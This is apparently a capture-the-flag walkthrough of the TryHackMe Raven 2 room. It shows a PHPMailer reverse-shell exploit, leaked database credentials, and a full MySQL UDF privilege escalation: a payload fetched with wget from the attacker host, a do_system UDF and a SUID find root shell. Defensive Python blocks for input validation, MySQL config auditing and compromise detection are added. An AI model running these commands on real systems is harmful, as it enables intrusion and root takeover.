TryHackMe | CTF | Walkthrough | Raven 2

Kapish Kuchroo
6 min read · Jan 21, 2022

Check out this virtual machine on TryHackMe. Log in to TryHackMe and go to Rooms → raven2uy. Link: https://tryhackme.com/room/raven2uy

Twice the trouble😭😭😭😭

Information Gathering:
Let’s connect to the target machine on TryHackMe and run nmap from the attacking virtual machine to collect information on the open ports. I head straight to the website to see what the web page looks like. Hopefully I can get some flags there.

Ooohh!! Almost forgot: I also ran gobuster from my machine. This gave me useful information about the directories present on the vulnerable machine.

FLAG 1:

Initially, I enumerated each and every web page on 10.10.48.67:80. I did not find anything useful there.

Interestingly, the /vendor directory was very helpful.

I opened the folder at that path, and look what I found!! It’s a flag!!

Flag 1 done and dusted. Let’s go yeahh!!!

FLAG 2:
I also checked out each and every folder in this directory. The Version folder seems to be insightful.

I googled whether there were any exploits related to the version number I found in the step above. Got an exploit named PHPMailer. Smooth!!

This part took me weeks to get to the end of. You guys are getting all this information smoothly!! Smash the like icon and follow me for updates on walkthroughs. It helps; thanks if you did that.

I used Wappalyzer to find out what the website is built with. Since the exploit targets PHPMailer, it has to be triggered through a PHP page, but all the pages I had seen on port 80 were HTML pages. Finally, I found contact.php, which is built with PHP. Kudos to Wappalyzer!!

I went to the script I found on Exploit-DB. There were 3 major changes that I made in the script.
1. Set the target of the vulnerability to <IP address>/contact.php, the page where this vulnerability exists (read up on PHPMailer’s function).

2. Set the backdoor’s name. Let it be reverse.php for now (this is very strange, but I tried using other names and they failed😭🥵; for some reason reverse.php is the only name that gives me the shell).

3. Set the local IP in the subprocess call (generally, your Kali Linux machine).

4. Finally, the location the backdoor is uploaded to on the server (/tmp -X/var/www/html/reverse.php).

Run the anarcoder script and wait for the success message.

A listener should be started now using netcat, since the backdoor will open a new connection back to port 4444 through the subprocess call.

Woop woop!! Reverse shell executed!! Flag found.
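What made the contact form exploitable is that a user-supplied sender address reached a sendmail command line, so a crafted address could smuggle extra options (the -X log-file path above is one) into it. The following is an added example of my own, not code from the walkthrough or from PHPMailer: a strict sender validator a developer would put in front of the mail call, plus a scan that flags PHP files dropped into the web root after the last deployment. The uid 33 for www-data, the deployment timestamp and all paths are constructed assumptions.

```python
"""Strict sender validation for a contact form, plus a web-root scan for dropped PHP files.

Added example, not part of the original walkthrough or of PHPMailer. The injection
needs whitespace, quoting or an option-looking dash inside the address; none of those
belong in a plain addr-spec, so refusing them removes the channel. All sample data is
constructed."""
import os
import re

# Plain addr-spec only: no quoted local part, spaces, quotes, backslashes or leading
# dash. Deliberately stricter than RFC 5322, which is the point.
_ADDR_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def sender_problems(addr: str) -> list[str]:
    """Return the reasons an address is unsafe to hand to a mail transport; empty means OK."""
    if not isinstance(addr, str) or not addr or len(addr) > 254:
        return ["empty-or-too-long"]
    reasons = []
    if any(ch.isspace() for ch in addr):
        reasons.append("whitespace")           # separates injected options from the address
    if any(ch in addr for ch in "\"'\\"):
        reasons.append("quote-or-backslash")   # quoted local parts are how the payload hides
    if addr.startswith("-"):
        reasons.append("leading-dash")         # would be parsed as an option
    if not _ADDR_RE.fullmatch(addr):
        reasons.append("not-a-plain-addr-spec")
    return reasons


def is_safe_sender(addr: str) -> bool:
    return not sender_problems(addr)


def scan_webroot(root: str) -> list[tuple[str, int, int]]:
    """Walk a real web root and return (path, mtime, uid) for every .php file."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                st = os.stat(path)
                found.append((path, int(st.st_mtime), st.st_uid))
    return found


def unexpected_php_files(entries, deployed_at: int, web_server_uid: int) -> list[str]:
    """PHP files modified after the last deployment, or owned by the web server account,
    are not what a normal deploy produces; both are how a dropped backdoor looks."""
    return sorted(path for path, mtime, uid in entries
                  if mtime > deployed_at or uid == web_server_uid)


# Constructed sample: deploy at epoch 1_640_000_000, web server uid 33 (assumption:
# Debian's www-data). Paths are hypothetical.
SAMPLE_ENTRIES = [
    ("/var/www/html/index.php", 1_639_000_000, 0),
    ("/var/www/html/contact.php", 1_639_000_000, 0),
    ("/var/www/html/reverse.php", 1_642_000_000, 33),  # written after deploy, owned by www-data
]

if __name__ == "__main__":
    for a in ["alice@example.com", '"x -X/tmp/x.php"@example.com', "-bob@example.com"]:
        print(a, "->", sender_problems(a) or "ok")
    print(unexpected_php_files(SAMPLE_ENTRIES, 1_640_000_000, 33))
```

On a real server, `scan_webroot("/var/www/html")` feeds `unexpected_php_files`; the validator belongs in the form handler before the address is passed anywhere near `mail()`, and patching PHPMailer is still the actual fix.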

I ran a Python web server to serve LinPEAS, a tool for enumerating a Linux machine. The credentials discovered by running LinPEAS were the WordPress database credentials: username root and password R@v3nSecurity.

mysql -u root -p (enter the password at the prompt) is the command used to access the database with the credentials discovered above.

Commands used in the following steps: view the databases with show databases;, select one of them with use <database name>;, list its tables with show tables; and display the contents of a table with select * from <table name>;.

After enumerating many database tables, I finally found the wp_users table, where I found a link. I opened the link through the URL and guess what, there was a flag sitting there waiting for me to grab. Wooop!! Wooop!!

FLAG 4:

We changed the working directory to /tmp and pulled in LinPrivChecker, a script that enumerates many of the basic and advanced Linux privilege escalation details.

I found that MySQL was running with root privileges. I checked for relevant escalation exploits and found one; check out the link below.

The exploit works by compiling the raw C code into a shared object (“.so” file), transferring it to the victim machine and then loading it through the MySQL server.
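The chain only works because of two server-side choices: mysqld runs as root (so anything it writes lands as root) and SQL-level file I/O is unrestricted. Both are visible in the configuration and the process list before anyone exploits them. The following is an added example of my own, not from the walkthrough or from MySQL: an offline audit over a my.cnf snippet and `ps -eo user,comm` output, both constructed here; on a real host, read /etc/mysql/my.cnf and the actual ps output instead.

```python
"""Audit of the MySQL settings that make the UDF privilege escalation possible.

Added example, not from the walkthrough. Findings: mysqld configured to run as root,
and secure-file-priv missing or empty (LOAD_FILE / INTO DUMPFILE can then reach any
path the server can write, including plugin_dir). Sample inputs are constructed."""


def parse_mysqld_section(cnf_text: str) -> dict:
    """Minimal my.cnf reader: returns [mysqld] options with '-' normalised to '_'.
    Options without '=' are boolean switches and map to None."""
    section, opts = None, {}
    for raw in cnf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("!"):        # blank, comment, !include directives
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "mysqld":
            continue
        key, sep, value = line.partition("=")
        key = key.strip().lower().replace("-", "_")
        opts[key] = value.strip().strip("\"'") if sep else None
    return opts


def audit_mysqld_config(cnf_text: str) -> list[tuple[str, str]]:
    """Return (finding_code, explanation) pairs; an empty list means nothing found."""
    opts = parse_mysqld_section(cnf_text)
    findings = []
    user = opts.get("user")
    if not user or user == "root":
        findings.append(("RUNS_AS_ROOT",
                         "user is unset or root: run mysqld as a dedicated account (user=mysql)"))
    sfp = opts.get("secure_file_priv")
    if sfp is None:
        findings.append(("FILE_IO_UNRESTRICTED",
                         "secure-file-priv not set: the default varies by version, so set it "
                         "explicitly to a dedicated directory or to NULL"))
    elif sfp == "":
        findings.append(("FILE_IO_UNRESTRICTED",
                         "secure-file-priv is empty: LOAD_FILE / INTO DUMPFILE may use any "
                         "path the server can write, including plugin_dir"))
    return findings


def mysqld_running_as_root(ps_output: str) -> bool:
    """True if any line of `ps -eo user,comm` output shows mysqld owned by root."""
    for line in ps_output.splitlines()[1:]:         # skip the header line
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "root" and parts[1] == "mysqld":
            return True
    return False


# Constructed samples; not taken from the target machine.
WEAK_CNF = """
[client]
port = 3306

[mysqld]
user = root
datadir = /var/lib/mysql
secure-file-priv =
plugin_dir = /usr/lib/mysql/plugin
skip-external-locking
"""

HARDENED_CNF = """
[mysqld]
user = mysql
secure-file-priv = /var/lib/mysql-files
plugin_dir = /usr/lib/mysql/plugin
"""

PS_SAMPLE = """USER     COMMAND
root     sshd
root     mysqld
www-data apache2
"""

if __name__ == "__main__":
    for code, why in audit_mysqld_config(WEAK_CNF):
        print(f"{code}: {why}")
    print("mysqld running as root:", mysqld_running_as_root(PS_SAMPLE))
```

The plugin directory itself should stay owned by root and unwritable by the mysql account; with `user=mysql` in place, a `DUMPFILE` write into it fails on permissions, which is exactly the step the escalation relies on.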

The first step was to compile it.
Commands:
searchsploit -m 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc

We then transferred this “.so” file into the /tmp directory on the victim’s machine. Commands:
wget http://10.9.178.153/1518.so
chmod 777 1518.so

Now we logged in to the MySQL interface.

Command : mysql -u root -p

After getting a MySQL prompt, we started exploiting it using the vulnerability we just found.

Command: use mysql;
Now, we created a table called “foo”

Into this table, we loaded the contents of the 1518.so file we just copied from the local machine into the /tmp directory.

We dumped the same file into the /usr/lib/mysql/plugin/ directory (the MySQL server runs as root, so it is allowed to write there).

In the most important step, we created a UDF named do_system that calls into the code in the shared object.

Hence, we invoke it with “chmod u+s /usr/bin/find” to set the SUID bit on “find”.

Commands:

create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');

Commands:

touch k2
find k2 -exec "whoami" \;
find k2 -exec "/bin/sh" \;
cd /root
ls
cat flag4.txt
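Everything above leaves durable traces on the box: a new row in mysql.func, a shared object in the plugin directory that no package installed, and a binary that suddenly carries the SUID bit. The following is an added example of my own, not from the walkthrough: each check compares current state with a known-good baseline, so it runs here on constructed inputs and on real collector output on a server (`find / -perm -4000 -type f`, `select name, dl from mysql.func`, sha256 of plugin_dir/*.so). Baselines, paths and digests below are constructed placeholders.

```python
"""Detection of the footprints left by a MySQL UDF privilege escalation.

Added example, not from the walkthrough. Three checks against a baseline: SUID drift,
UDFs registered in mysql.func, and plugin-directory shared objects whose hash is not in
the package manifest. Samples and baselines are constructed."""
import hashlib
import os
import stat


def collect_suid(root: str = "/") -> set[str]:
    """Real collector: every regular file under root with the setuid bit set."""
    found = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found


def suid_drift(current: set[str], baseline: set[str]) -> dict[str, set[str]]:
    """Paths that gained or lost the SUID bit relative to the baseline snapshot."""
    return {"added": current - baseline, "removed": baseline - current}


def rogue_udfs(func_rows, approved: frozenset = frozenset()) -> list[tuple[str, str]]:
    """Rows of mysql.func (name, dl) not on the approved list. A stock server has no
    rows there, so the approved set is usually empty and any row is a finding."""
    return [(name, dl) for name, dl in func_rows if (name, dl) not in approved]


def hash_plugin_dir(plugin_dir: str) -> dict[str, str]:
    """Real collector for unapproved_plugins(): sha256 of every .so in plugin_dir."""
    out = {}
    for name in os.listdir(plugin_dir):
        if name.endswith(".so"):
            with open(os.path.join(plugin_dir, name), "rb") as fh:
                out[name] = hashlib.sha256(fh.read()).hexdigest()
    return out


def unapproved_plugins(present: dict[str, str], approved: dict[str, str]) -> list[str]:
    """Shared objects in plugin_dir whose sha256 does not match the package manifest."""
    return sorted(f for f, digest in present.items() if approved.get(f) != digest)


# Constructed baseline and current state; digests are placeholders, not real hashes.
BASELINE_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/bin/mount"}
CURRENT_SUID = BASELINE_SUID | {"/usr/bin/find"}
FUNC_ROWS = [("do_system", "1518.so")]
PRESENT_SO = {"auth_socket.so": "a" * 64, "1518.so": "b" * 64}
APPROVED_SO = {"auth_socket.so": "a" * 64}

if __name__ == "__main__":
    print("SUID drift:", suid_drift(CURRENT_SUID, BASELINE_SUID))
    print("UDFs not approved:", rogue_udfs(FUNC_ROWS))
    print("plugins not in manifest:", unapproved_plugins(PRESENT_SO, APPROVED_SO))
```

In practice the baseline for `suid_drift` is taken from a clean build of the same image and stored off-host, and the plugin manifest comes from the package manager, so that the comparison is not made against files the attacker could have already replaced.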

Woop!! Woop!! Got the final flag. Well, this was one of the more tedious machines I have done. Nevertheless, relentless.

Smash the like icon, catch you in the next one.
Peace✌🏽
